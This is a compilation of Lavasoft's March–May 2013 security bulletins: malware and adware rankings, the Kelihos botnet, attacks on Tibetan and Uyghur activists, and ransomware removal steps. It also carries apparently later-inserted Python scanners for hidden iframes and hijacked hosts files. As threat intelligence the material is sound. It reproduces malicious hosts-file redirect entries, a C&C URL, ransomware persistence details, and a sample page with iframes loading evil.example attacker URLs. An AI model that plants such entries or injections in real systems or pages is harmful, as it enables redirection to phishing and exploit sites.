
Lavasoft Security Bulletin: March 2013


Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 29.18% | -2.82%
2 | Win32.Trojan.Agent | 26.98% | +4.71%
3 | Trojan.Win32.Generic.pak!cobra | 3.41% | +0.56%
4 | Virus.VBS.Ramnit.a | 2.92% | new
5 | Virus.Win32.Sality.at | 2.50% | +1.16%
6 | Malware.JS.Generic | 2.21% | -1.47%
7 | Trojan.Win32.Ramnit.c | 2.12% | 0.00%
8 | Virus.Win32.Sality.bh | 1.97% | +0.73%
9 | Virus.Win32.Ramnit.b | 1.55% | +0.1%
10 | Virus.Win32.Sality.ah | 1.45% | +2.69%
11 | INF.Autorun | 1.13% | +0.43%
12 | HackTool.Win32.Keygen | 1.03% | -0.15%
13 | Email-Worm.Win32.Brontok.ik | 0.97% | new
14 | Trojan.Win32.Jpgiframe | 0.86% | +0.04%
15 | Virus.Win32.Ramnit.a | 0.83% | -0.35%
16 | Email-Worm.Win32.Brontok.a | 0.78% | -0.96%
17 | Virus.Win32.Sality.atbh | 0.77% | new
18 | Trojan-Clicker.HTML.Iframe | 0.71% | -0.14%
19 | Trojan.Win32.Sirefef.bb | 0.58% | new
20 | Heur.HTML.MalIFrame | 0.56% | -0.25%

The Top 20 malicious programs blocked on PCs

March sees increased activity of Virus.VBS.Ramnit.a, a script virus written in Visual Basic Script, previously described in a Lavasoft whitepaper published in May 2012. A modification of the ZeroAccess Trojan, Trojan.Win32.Sirefef.bb, has re-entered the Top 20 at position 19, suggesting a drop in prevalence compared to January. March sees a new modification of Email-Worm.Win32.Brontok.ik at position 16 and Virus.Win32.Sality.atbh at position 17. In March, INF.Autorun rose by 9 positions compared to February. Attackers continue to exploit this old method to spread malicious programs; its continued prevalence can be attributed to the autorun/autoplay feature being enabled on compromised machines.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 29.76% | +4.05%
2 | Trojan.Win32.Generic.pak!cobra | 2.52% | +0.4%
3 | Virus.Win32.Expiro.bc | 1.76% | -0.17%
4 | Virus.Win32.Virut.ce | 1.38% | +0.34%
5 | Trojan.Win32.Dwnldr.y | 1.30% | -0.04%
6 | Trojan.Win32.Medfos.m | 1.30% | -0.05%
7 | Trojan.Win32.Winwebsec.fd | 0.56% | -0.02%
8 | Trojan.Win32.Vobfus.paa | 0.49% | -0.03%
9 | Trojan.JS.Obfuscator.aa | 0.45% | +0.07%
10 | Trojan.Win32.Tepfer.a | 0.43% | new
11 | Malware.JS.Generic | 0.38% | +0.12%
12 | Trojan.JS.IFrame.i | 0.37% | -0.02%
13 | Worm.Win32.Mabezat.b | 0.35% | +0.04%
14 | Virus.Win32.PatchLoad.d | 0.33% | +0.22%
15 | Win32.Malware!Drop | 0.24% | +0.05%
16 | Trojan-PWS.Win32.Zbot.aql | 0.20% | 0.00%
17 | Worm.Win32.Esfury.ta | 0.18% | -0.02%
18 | Trojan.Win32.Autorun.dm | 0.17% | +0.05%
19 | Trojan.Win32.Generic!SB.0 | 0.14% | +0.02%
20 | FraudTool.Win32.FakeRean.i | 0.15% | new

New malicious programs entered the Top 20

Virus.Win32.Expiro.bc entered the Top 20 at position 3 in February and remains at that position. March sees the appearance of a new Trojan program, Trojan.Win32.Tepfer.a, designed to steal user’s confidential data as well as a fake antivirus, FraudTool.Win32.FakeRean.i, entering the Top 20 at positions 10 and 12 respectively. See below for examples of FraudTool.Win32.FakeRean.i and more fake antivirus programs whose interfaces make up our Rogues gallery in March.

Fake AV (MD5: 61ea70df4955cdcd61cc8064bde3afc1) is detected by Ad-Aware as Trojan.Win32.Generic!BT

Fake AV (MD5: 33caefd51a53042c5e4c783d73a006e6) is detected by Ad-Aware as FraudTool.Win32.FakeRean.i

Fake AV (MD5: d10d8161f1b3a01bf28894eac0e553e8) is detected by Ad-Aware as FraudTool.Win32.FakeRean.i

Fake AV (MD5: 87e1e9607b2f334183f92d61b0549ccd) is detected by Ad-Aware as FraudTool.Win32.FakeSmoke

Kelihos is More Alive Than Ever

After the much-publicized botnet shutdown at the RSA Conference, our malware analysis system registered the spam bot using 944 public mail servers to send spam.

In March, Kelihos continues to send pharmaceutical spam e-mails:

Example of spam message sent by a bot

in an attempt to persuade users to purchase medicines to enhance sexual intimacy:

Spam emails promoting "Pengram Corporation" are also sent:

Example of spam message sent by a bot

Example of spam message sent by a bot

Trustwave SpiderLabs research shows that botnet activity not only persists but increased dramatically after the takedown presentation. The decentralised structure of the P2P botnet, the use of packers, and the continual distribution of new modifications allow attackers to actively counteract botnet takedown attempts. Kelihos operators continue to deploy countermeasures against sinkholes.

Botnet takedowns are not a trivial task for antivirus companies, although attempts to disrupt the botnet can cause economic damage to those controlling the botnets. Efforts to disrupt botnets are hampered by ethical and privacy issues; for example, an antivirus researcher who infiltrates the botnet and issues commands to deactivate the bot software on a victim’s compromised machine is violating the victim’s privacy in the same way the botnet controller does. Furthermore, if the researcher inadvertently damages the compromised machine, the victim may attempt to take legal action against the researcher.

Targeted Attacks against Tibetan and Uyghur Activists in March

These targeted attacks have been discussed frequently, but during the last month, we noticed more references by security labs. In the middle of March, researchers from AlienVault Labs published a report describing how the attackers had been using the latest Adobe PDF exploit to attack Tibetan and Uyghur non-governmental and human rights organizations.

The malicious PDFs being sent contained exploits for the vulnerability CVE-2013-0640 which had been already patched by Adobe on the 13th of February. According to the Kaspersky Lab, the same exploit was used in the MiniDuke campaign.

Once a user opens the document, a malicious DLL is dropped onto the system while a letter titled “Noruz Bayram Merikisige Teklip” is displayed.

According to the date stamp found inside the PDF file, it was created on 4th of February, 2013.

At the end of March, Kaspersky Lab published a report devoted to the new attack against Tibetan and Uyghur activists using Android malware.

The attack initially started with hacking the Tibetan activist’s email account. The compromised account was then used to send a spear phishing email in which attackers invite a victim to the World Uyghur Congress. The email contains the “WUC’s Conference.apk” file, a Trojan application that targets Android.

Upon installation, the application acquires the following permissions:

Once executed, the Trojan collects confidential information from a phone (phone data, contacts, location and recent victim’s calls and messages) and sends it to the C&C server (64.78.161.133):

It displays a ‘bait’ message at the same time.

The Trojan uses the “com.google.services” folder to store its files:

In addition, the code contains many strings in Chinese, suggesting that it could have been written by Chinese hackers/developers.

It is thought that this is not the last attack against Tibetan and Uyghur organizations supposedly organized by Chinese cybercriminals. Windows, MacOS and now the Android platform have already been used to run Trojans in these attacks. Which platform is going to be compromised next?

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | MyWebSearch | 29.31% | -0.61%
2 | Win32.Toolbar.Iminent | 15.67% | +1.78%
3 | Win32.PUP.Bandoo | 9.64% | +0.48%
4 | SweetIM | 7.21% | -3.34%
5 | Bprotector | 6.40% | -1.66%
6 | Babylon | 2.74% | -1.06%
7 | Yontoo | 2.23% | +0.52%
8 | Wajam | 1.94% | +0.57%
9 | InstallBrain | 1.90% | -0.68%
10 | Artua Vladislav | 1.67% | 0.00%
11 | Win32.Adware.ShopAtHome | 1.54% | -0.22%
12 | Click run software | 1.47% | +0.02%
13 | DownloadMR | 1.30% | new
14 | GamePlayLabs | 1.29% | -0.06%
15 | Vittalia Installer | 1.18% | new
16 | Win32.Toolbar.Mediabar | 1.18% | -0.33%
17 | Win32.PUP.Predictad | 1.14% | +0.19%
18 | Win32.Toolbar.SearchQU | 1.10% | -0.1%
19 | Optimum Installer | 0.81% | +0.06%
20 | RelevantKnowledge | 0.76% | -0.17%

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.


Lavasoft Security Bulletin: April 2013


Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 30.54% | +3.56%
2 | Trojan.Win32.Generic!BT | 27.12% | -2.01%
3 | Trojan.Win32.Generic.pak!cobra | 2.95% | -0.46%
4 | Virus.Win32.Sality.r | 2.44% | new
5 | Trojan.Win32.AutoIt.gen.1 | 2.36% | new
6 | Virus.Win32.Sality.at | 2.09% | -0.41%
7 | Malware.JS.Generic | 2.04% | -0.17%
8 | Virus.Win32.Sality.ah | 1.72% | +0.27%
9 | Email-Worm.Win32.Brontok.a | 1.42% | +0.64%
10 | Virus.Win32.Sality.am | 1.25% | new
11 | Virus.Win32.Ramnit.b | 1.07% | +0.48%
12 | Worm.Win32.Pykspa | 1.01% | new
13 | Virus.Win32.Ramnit.a | 0.98% | +0.15%
14 | INF.Autorun | 0.90% | -0.23%
15 | Trojan.Win32.Ramnit.c | 0.86% | -1.26%
16 | Virus.VBS.Ramnit.a | 0.83% | -2.09%
17 | HackTool.Win32.Keygen | 0.81% | -0.22%
18 | Trojan.Win32.Sirefef.bb | 0.70% | +0.12%
19 | Trojan.Win32.Jpgiframe | 0.43% | -0.43%
20 | Heur.HTML.MalIFrame | 0.27% | -0.29%

The Top 20 malicious programs blocked on PCs

April sees a position change for the most prevalent generic detections: Trojan.Win32.Generic!BT and Win32.Trojan.Agent. Compared to March, new modifications of Sality, Virus.Win32.Sality.r and Virus.Win32.Sality.am, entered the Top 20 at positions 4 and 10 respectively. A new generic detection for Trojans written in the AutoIt script language, Trojan.Win32.AutoIt.gen.1, entered the Top 20. A new worm, Worm.Win32.Pykspa, which can give an attacker remote access to a compromised system, also appears in the Top 20. The worm spreads via Skype, Twitter, network shares and removable drives, prevents users from visiting internet resources belonging to antivirus companies, and terminates processes belonging to various utilities for diagnosing an infected system, including antivirus products.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 36.37% | +6.61%
2 | Trojan.Win32.Generic.pak!cobra | 3.57% | +1.05%
3 | Virus.Win32.Expiro.bc | 1.70% | -0.06%
4 | Virus.Win32.Virut.ce | 1.59% | +0.21%
5 | Trojan.Win32.Medfos.m | 1.35% | -0.05%
6 | Trojan.Win32.Dwnldr.y | 1.29% | -0.01%
7 | Worm.Win32.Mabezat.b | 0.57% | +0.22%
8 | Trojan.JS.Obfuscator.aa | 0.56% | +0.11%
9 | Trojan.Win32.Winwebsec.fd | 0.54% | -0.02%
10 | Trojan.Win32.Vobfus.paa | 0.49% | -0.00%
11 | Malware.JS.Generic | 0.48% | +0.1%
12 | Virus.Win32.PatchLoad.d | 0.41% | +0.08%
13 | Win32.Malware!Drop | 0.41% | +0.17%
14 | Trojan.JS.IFrame.i | 0.37% | +0.00%
15 | Trojan.Win32.Generic!SB.0 | 0.29% | +0.05%
16 | Trojan.Win32.Tepfer.a | 0.24% | -0.19%
17 | TrojanPWS.Win32.OnLineGames.ahj | 0.24% | new
18 | Trojan.Win32.Autorun.dm | 0.19% | +0.02%
19 | Trojan-PWS.Win32.Zbot.aql | 0.20% | +0.00%
20 | Trojan.Win32.Urelas.a | 0.18% | new

New malicious programs entered the Top 20

April sees two new families, TrojanPWS.Win32.OnLineGames.ahj and Trojan.Win32.Urelas.a, at position 17 and 20 respectively.

TrojanPWS.Win32.OnLineGames.ahj is a dynamic-link library (DLL). It is an Internet Explorer Browser Helper Object (BHO) that runs whenever Internet Explorer launches. It collects data users enter on online game web sites and sends the stolen data to the attackers’ servers.

Trojan.Win32.Urelas.a provides an attacker with remote access to the infected computer. Taking commands from the C&C server, the Trojan downloads its own updates and other malicious programs, steals the user’s confidential data, and collects information about the system.

This month our automatic analysis system detected an increase of ransom Trojans among Trojan.Win32.Generic!BT generic detections. Let’s consider some of them as well as options for manually removing these threats from the infected computer.

Example 1. This is what the malicious program preventing the computer from performing properly looks like:

Ransomware (MD5: 627e226a5924634651c264f033b1ba33) is detected by Ad-Aware as Trojan.Win32.Generic!BT

The Trojan is easily removed in Windows Safe Mode. The Trojan body needs to be removed from the current user's Application Data folder:

%Documents and Settings%\%CurrentUser%\%AppData%\top1.exe

As well as autorun registry key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"top" = "%Documents and Settings%\%CurrentUser%\%AppData%\top1.exe"

The attackers’ server, from which the HTML page that locks the computer is loaded, is located in Germany:

Example 2. This is what the malicious program preventing the computer from performing properly looks like:

Ransomware (MD5: 2a1864a89a64b3617fc5f233ed3f604c) is detected by Ad-Aware as Trojan.Win32.Generic!BT

This Trojan is more complicated to remove, because it references itself from a less obvious registry value:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "%Documents and Settings%\%CurrentUser%\%AppData%\Battleshield.exe"

Because this value also launches the Trojan in Safe Mode, start Windows in Safe Mode with Command Prompt and run the following commands to remove the autorun capability and the Trojan body:

reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell

del "%Documents and Settings%\%CurrentUser%\%AppData%\Battleshield.exe"

The attackers’ server, from which the HTML page that locks the computer is loaded, is located in Germany:

Example 3. This is what the malicious program preventing the computer from performing properly looks like:

Ransomware (MD5: b4cb159208511637ca06e78dbfb0af97) is detected by Ad-Aware as Trojan.Win32.Generic!BT

This Trojan is much more complicated to remove, as the attackers have made efforts to prevent deletion of the malicious program in Safe Mode. After infection, the Trojan removes all keys from the registry branch:

[HKLM\System\CurrentControlSet\Control\SafeBoot]

This leads to a BSOD when attempting to start Windows in Safe Mode:

The Trojan copies itself to the current user's Windows temporary folder:

%Temp%\WindowsUpdate.exe

If more than one user has access to the infected computer, it is possible to use the "Win+L" hot key to sign in to Windows from a different account. From there, the Trojan body and its autorun registry key can be removed:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsUpdate.exe" = "%Temp%\WindowsUpdate.exe"

And restore the registry branch:

[HKLM\System\CurrentControlSet\Control\SafeBoot]

Otherwise, a bootable CD or USB flash drive must be used to restore the system, or the infected hard drive must be attached to another system and either scanned with an antivirus program or cleaned by removing the Trojan body manually.

The attackers’ server, from which the HTML page that locks the computer is loaded, is located in the UK:

Ad-Aware antivirus is capable of detecting ransom Trojan infections such as those described above. If your computer is infected by a ransom Trojan of this type, do not panic, and do not pay the attackers a fee to unlock your computer. It is always possible to cure your system: "Fortune favours the brave".

Skyper

In April, the activity of "Skyper" IRCBot was observed. "Skyper" used social engineering techniques to spread itself using instant messaging services:

Malware memory dump fragment

If any instant messaging software was installed on the infected computer, the malware sent messages containing a link to its body to all contacts from the list. The malware works out the locale of the infected OS and sends random phrases in the corresponding language.

Text message sample for the Italian locale

Afterwards, a link created with the Goo.gl URL shortener was appended to the text.

http://www.goo.gl/***?image=IMG0540240-JPG

A peculiarity of the worm is that it installs a module designed to run a bitcoin generator on the infected computer. The bitcoin mining process places significant load on the affected machine.

A process of malware module responsible for bitcoin generation

Attackers continue to use various social engineering techniques to spread malware. This effective technique allows for the creation of huge botnets. The chances are very high that someone who receives a message from a friend containing the text "You look so beautiful on this picture", along with a link, will click that link.

Bitcoin mining remains a profitable business for attackers. Bitcoin exchange rates help demonstrate this; the price of one BTC recently reached $260. Sensing easy money, criminals surreptitiously install Bitcoin mining software on the zombie machines in their botnets.

Bitcoin Charts, resource: Mtgox

You can read a more detailed description of the spreading techniques and payload of this malware in our Malware Encyclopedia.

Top20 Potentially Unwanted Programs

Below are the Top20 Potentially Unwanted Programs blocked by Ad-Aware on user’s PCs. These are advertising software, browser toolbars, search engines and other programs which change browser start pages and other system settings.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | MyWebSearch | 22.61% | -6.7%
2 | Adware.Linkury | 18.18% | new
3 | Win32.Toolbar.Iminent | 9.63% | -6.04%
4 | Win32.PUP.Bandoo | 7.08% | -2.56%
5 | SweetIM | 5.55% | -1.66%
6 | Bprotector | 4.46% | -1.94%
7 | Wajam | 2.36% | +0.42%
8 | Yontoo | 2.27% | +0.04%
9 | Babylon | 1.71% | -1.03%
10 | 1ClickDownloader | 1.44% | new
11 | InstallBrain | 1.40% | -0.5%
12 | Artua Vladislav | 1.40% | -0.27%
13 | DownloadMR | 1.35% | +0.05%
14 | CoolMirage Ltd | 1.35% | new
15 | GamePlayLabs | 1.17% | -0.12%
16 | DomaIQ | 1.15% | new
17 | ExpressFiles Installer | 1.11% | new
18 | Win32.Adware.ShopAtHome | 1.10% | -0.44%
19 | BetterInstaller | 1.10% | new
20 | Click run software | 1.0% | -0.37%

Top20 PUPs detected on user’s PC

Operating Systems

Infections by OS

Geographic Location

Infections by country of origin

We will keep investigating the epidemiological situation in the world and informing our readers about new malicious code samples in the next Lavasoft Security Bulletin.

Update Windows to Avoid Vulnerability Exploits


According to the Net Applications statistics, Microsoft Windows is the most prevalent OS. In April the top operating systems in use were:

  1. Windows 7
  2. Windows XP
  3. Windows Vista

In spite of the fact that Microsoft has announced it will stop supporting Windows XP in April 2014, users are not willing to abandon the operating system they are accustomed to and upgrade to the newer versions, Windows 7 and Windows 8.

Based on the Net Applications statistics, Internet Explorer 8.0 is the most popular browser. The installation rate of Explorer 8.0 is 4% higher than that of Explorer 9.

The statistics show a 3% decrease in the popularity of Explorer 8.0 over the year. This speaks to the browser's stability and to users’ preferences.

Unfortunately, popularity does not ensure security. Being so widespread, the browser becomes a high-priority target for attackers, who continue to seek out and exploit new vulnerabilities.

The CGenericElement Object Use-After-Free Vulnerability (MS13-038, CVE-2013-1347) found in May 2013 is such a vulnerability. It exists in Microsoft Internet Explorer because a “use-after-free” error occurs when a CGenericElement object is freed but a reference to it is kept on the Document and used again during rendering.

To explore the vulnerability, let’s use an exploit that has already appeared in the Metasploit Framework. We will use Windows XP SP3 with the latest updates and Internet Explorer 8 installed as the test system.

Once a web page containing the exploit is opened, the user sees the browser hang (freeze) for several seconds, making it impossible to close the browser in the usual way. The only way to end the "iexplore.exe" process is through Task Manager. Meanwhile, some activity takes place in the browser process:

The test payload launches notepad.exe and injects malicious code into the "notepad.exe" process.

On the attacker’s server, the attack on the vulnerable system is presented as follows:



On the compromised machine, an attacker can:

  • Use the system as a temporary stage to attack further targets.
  • Obtain a higher level of access and get the Administrator privileges.
  • Disable UAC.
  • Get detailed information about OS.
  • Get full access to the file system.
  • Add user accounts.
  • Download and launch any file.
  • Steal confidential information from:
    • Browsers;
    • IM clients;
    • Skype, Bitcoin;
    • File managers;
    • FTP, SFTP, SSH, SCP clients;
    • Email clients;
    • Standard Windows storages;
    • Wireless connection system.
  • Listen to the microphone, capture web-camera screenshots, track keystrokes.
  • Get full control of the system using Remote Desktop.
  • Restore deleted files.
  • Explore network environment of the compromised system.
  • Perform injections of malicious code into the address space of any process.

Almost 24% of users are at risk of attack and infection of their PCs: these are Windows XP SP3 users and those who use Internet Explorer 8 as their default browser.

To prevent infection, it is recommended to enable the Firewall and Automatic Updates features and to install Ad-Aware. It is also highly recommended to be cautious when opening unknown or suspicious links in a browser.

Lavasoft Security Bulletin: May 2013


Top20 Blocked Malware

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Win32.Trojan.Agent | 31.30% | +0.76%
2 | Trojan.Win32.Generic!BT | 24.04% | -3.08%
3 | Virus.Win32.Sality.at | 3.40% | +1.31%
4 | Virus.Win32.Sality.r | 2.91% | +0.47%
5 | Trojan.Win32.Generic.pak!cobra | 2.62% | -0.33%
6 | Trojan.JS.Generic | 2.50% | new
7 | Worm.Win32.Vobfus.dla | 2.09% | new
8 | Virus.VBS.Ramnit.a | 1.94% | +1.11%
9 | Malware.JS.Generic | 1.75% | +0.29%
10 | HackTool.Win32.Keygen | 1.72% | -0.22%
11 | Virus.Win32.Ramnit.b | 1.48% | +0.41%
12 | Email-Worm.Win32.Brontok.a | 1.45% | +0.03%
13 | Virus.Win32.Sality.ah | 1.02% | -0.7%
14 | Virus.Win32.Neshta.a | 1.01% | new
15 | INF.Autorun | 0.99% | +0.09%
16 | Trojan.Win32.Ramnit.c | 0.86% | 0.00%
17 | Trojan.Win32.Sirefef.bb | 0.69% | -0.01%
18 | Win32.Backdoor.Inject | 0.62% | new
19 | Trojan.Win32.Jpgiframe | 0.56% | +0.13%
20 | Heur.HTML.MalIFrame | 0.42% | +0.15%

The Top 20 malicious programs blocked on PCs

May sees two new detections: Trojan.JS.Generic, written in JavaScript, and Worm.Win32.Vobfus.dla, written in Visual Basic. Worm.Win32.Vobfus.dla allows attackers to install additional malware on the infected computer. It spreads via network and removable drives, saving autorun.inf to the root folder of the infected drive; autorun.inf launches the worm's executable file each time Explorer is used to open the infected drive.

Virus.Win32.Neshta.a has been discussed previously in a Lavasoft whitepaper published in March 2012 and information about Win32.Backdoor.Inject can be found in a whitepaper published in January 2013.

New Incomings to the Lab

Let’s review and consider information on the number of unique files with the same detection name.

Position | Ad-Aware detection | % of all threats | Change in ranking
1 | Trojan.Win32.Generic!BT | 36.03% | -0.37%
2 | Trojan.Win32.Generic.pak!cobra | 3.06% | -0.51%
3 | Virus.Win32.Expiro.bc | 2.55% | +0.85%
4 | Trojan.Win32.Dwnldr.y | 2.29% | +1.00%
5 | Trojan.Win32.Medfos.m | 1.66% | +0.31%
6 | Virus.Win32.Virut.ce | 1.54% | -0.05%
7 | Trojan.Win32.Generic!SB.0 | 1.53% | +1.24%
8 | Worm.Win32.Mabezat.b | 0.59% | +0.02%
9 | TrojanPWS.Win32.OnLineGames.ahj | 0.59% | +0.35%
10 | Malware.JS.Generic | 0.59% | +0.11%
11 | Exploit.HTML.Iframe.dm | 0.53% | new
12 | Trojan.Win32.Qhosts.bf | 0.51% | new
13 | Trojan.JS.Obfuscator.aa | 0.47% | -0.09%
14 | Trojan.Win32.Winwebsec.fd | 0.40% | -0.14%
15 | Trojan-PWS.Win32.Zbot.aql | 0.40% | +0.2%
16 | Trojan.JS.IFrame.i | 0.38% | +0.01%
17 | Trojan.Win32.Vobfus.paa | 0.29% | -0.2%
18 | Virus.Win32.PatchLoad.d | 0.24% | -0.17%
19 | Win32.Malware!Drop | 0.18% | -0.23%
20 | Trojan.Win32.Tepfer.a | 0.12% | -0.12%

New malicious programs entered the Top 20

May sees two new families in the Top 20.

Exploit.HTML.Iframe.dm is embedded as an iframe in HTML pages. Once a user opens an infected website, a URL chosen by the attacker is loaded in a frame 2 px high and 2 px wide, which is practically invisible:

Fragment of Exploit.HTML.Iframe.dm MD5: d69388832917ee228b14cf1e1c3fd21e

Using this technique, attackers can redirect a user to malicious websites containing exploits to execute arbitrary code on the target system.
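A defender checking pages for this kind of injection looks for iframes that are too small to see or are hidden via CSS. The following is an added illustration, not Lavasoft's code or the detection logic of Ad-Aware: a small scanner built on Python's standard html.parser that flags iframes of 4 px or less in both dimensions (an assumed threshold with a little slack around the 2x2 px described above) or hidden with display:none / visibility:hidden. The HTML sample and the evil.example URL are constructed for the demonstration.

```python
"""Flag near-invisible iframes of the kind Exploit.HTML.Iframe.dm injects.
Added illustration, not Lavasoft's code; the sample page and the 4 px
threshold are assumptions."""
from html.parser import HTMLParser
import re

MAX_HIDDEN_PX = 4   # assumed threshold: 2x2 px as described, with a little slack


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes (names lower-cased)."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


_PX = re.compile(r"^\s*(\d+)\s*(px)?\s*$", re.I)
_STYLE_DIM = re.compile(r"(width|height)\s*:\s*(\d+)\s*px", re.I)


def pixel_size(attrs):
    """Return (width, height) in px from width/height attributes or inline style.
    A dimension that is missing or not in pixels (e.g. 100%) comes back as None."""
    dims = {"width": None, "height": None}
    for k in dims:
        m = _PX.match(attrs.get(k, ""))
        if m:
            dims[k] = int(m.group(1))
    for k, v in _STYLE_DIM.findall(attrs.get("style", "")):
        dims[k.lower()] = int(v)   # inline style overrides the attribute
    return dims["width"], dims["height"]


def hidden_iframes(html):
    """Return iframes that are tiny (<= MAX_HIDDEN_PX both ways) or CSS-hidden."""
    p = IframeCollector()
    p.feed(html)
    flagged = []
    for a in p.iframes:
        w, h = pixel_size(a)
        style = a.get("style", "").lower().replace(" ", "")
        tiny = (w is not None and h is not None
                and w <= MAX_HIDDEN_PX and h <= MAX_HIDDEN_PX)
        css_hidden = "display:none" in style or "visibility:hidden" in style
        if tiny or css_hidden:
            flagged.append({"src": a.get("src", ""), "width": w, "height": h,
                            "reason": "tiny" if tiny else "css-hidden"})
    return flagged


# Constructed sample: one benign video embed plus two injected hidden frames.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://video.example/embed/1" width="640" height="360"></iframe>
<IFRAME SRC="http://evil.example/landing.php" WIDTH=2 HEIGHT=2 FRAMEBORDER=0></IFRAME>
<iframe src="http://evil.example/x.html" style="display: none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in hidden_iframes(SAMPLE_PAGE):
        print(f"{f['reason']:10} {f['src']} ({f['width']}x{f['height']})")
```

The benign 640x360 embed passes; the 2x2 frame is reported as "tiny" and the display:none frame as "css-hidden". Any hit should be matched against the site's own templates before it is called an injection, since legitimate tracking pixels use the same trick.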

Trojan.Win32.Qhosts.bf, written in Delphi, is designed to modify the "%System%\drivers\etc\hosts" file, which maps host names to IP addresses ahead of DNS. Trojan.Win32.Qhosts.bf writes the following lines to the "hosts" file:

94.249.189.25  my.mail.ru
94.249.189.25  m.my.mail.ru
94.249.189.25  vk.com
94.249.189.25  m.vk.com
94.249.189.25  odnoklassniki.ru
94.249.189.25  m.odnoklassniki.ru
94.249.189.25  ok.ru
94.249.189.25  m.ok.ru

Opening any of the URLs mentioned above redirects all user requests to 94.249.189.25.

The Trojan extracts the batch file "rasstavanie.bat", two Visual Basic script files, "eto.vbs" and "naverno.vbs", and two files containing service information, "ruoshka.txt" and "mainlol.txt", and saves them under the Program Files folder:

%Program Files%\akvi\kavi\

The command interpreter script is what modifies the "%System%\drivers\etc\hosts" file:

Rasstavanie.bat batch file fragment

The "naverno.vbs" script sets the hidden attribute on the "%System%\drivers\etc\hosts" file. The "eto.vbs" script sends an HTTP GET request to the following URL:

http://94.249.188.143:9007/stat/tuk/210

When manually removing this Trojan, the following folder must be removed:

%Program Files%\akvi

Make the "%System%\drivers\etc\hosts" file visible again by enabling the display of hidden files and folders, then restore the file's original content.

Attackers often use this technique to block access to Internet resources or redirect users to phishing pages to steal information. If you suspect this happening, check the "hosts" file for unusual or suspicious entries.
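The check suggested above, as an added example that is not Lavasoft's code: a small Python audit that parses a hosts file and reports every name that is mapped to a routable public address. Loopback and blackhole targets (127.0.0.1, 0.0.0.0, ::1) are the normal sinkhole and ad-block usage and are not flagged, nor are private LAN addresses; the hosts content below is constructed to mirror the Qhosts.bf entries listed above, and the address classification rules are this example's own assumptions.

```python
"""Audit a Windows hosts file for entries that hijack well-known domains.
Added illustration, not Lavasoft's code. SAMPLE_HOSTS is constructed from the
Qhosts.bf entries in the bulletin plus a stock header and one ad-block line."""
import ipaddress

SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
94.249.189.25  my.mail.ru
94.249.189.25  m.my.mail.ru
94.249.189.25  vk.com
94.249.189.25  m.vk.com
94.249.189.25  odnoklassniki.ru
94.249.189.25  m.odnoklassniki.ru
94.249.189.25  ok.ru
94.249.189.25  m.ok.ru
0.0.0.0         ads.example.invalid   # constructed ad-block entry, benign
"""

# Targets that only sinkhole a name rather than redirect it elsewhere.
LOCAL_ADDRESSES = {"127.0.0.1", "0.0.0.0", "::1"}


def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every mapping in a hosts file.
    Comments (#...) and blank lines are skipped; one IP may carry several names."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        ip, names = fields[0], fields[1:]
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue  # malformed line, not a mapping
        for name in names:
            yield ip, name.lower(), line_no


def suspicious_entries(text):
    """Return entries that send a name to a routable, non-local address.
    Pointing a name at a public IP is exactly what a redirecting Trojan such
    as Qhosts writes; LAN overrides (private ranges) are left alone here."""
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if ip in LOCAL_ADDRESSES:
            continue
        addr = ipaddress.ip_address(ip)
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            continue
        findings.append({"line": line_no, "host": name, "ip": ip})
    return findings


def redirect_targets(text):
    """Group flagged hostnames by the address they are sent to: one public IP
    collecting many unrelated names is the Qhosts pattern."""
    by_ip = {}
    for f in suspicious_entries(text):
        by_ip.setdefault(f["ip"], []).append(f["host"])
    return by_ip


if __name__ == "__main__":
    for ip, hosts in redirect_targets(SAMPLE_HOSTS).items():
        print(f"{ip} hijacks {len(hosts)} names: {', '.join(hosts)}")
```

On a real machine the text would be read from %SystemRoot%\System32\drivers\etc\hosts (with hidden-file display enabled, as the Trojan above sets the hidden attribute); a single result line naming eight social-network hosts behind one public address is the signal to restore the file.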

Ransom Trojans continue to be highly prevalent threats that are frequently analysed by our automated malware analysis systems. Information on how to manually delete these threats can be found here.

Ransomware: Example 1

Ransomware (MD5: a8c05e37d057fad41dd07be3b46a8c3b) is detected by Ad-Aware as Trojan.Win32.Generic!BT

It is a dynamic-link library (DLL). After activation, it copies itself under a randomly generated name to the ‘All Users’ Application Data folder:

%Documents and Settings%\All Users\%AppData%\1doqet.dat

The Trojan creates a link to itself named "msconfig.lnk" in the current user's Windows Startup folder, which launches the Trojan when the user logs in to Windows:

%Documents and Settings%\%Current User%\Start Menu\Programs\Startup\msconfig.lnk

It also adds a registry autorun key to be doubly sure that the malware survives a reboot:

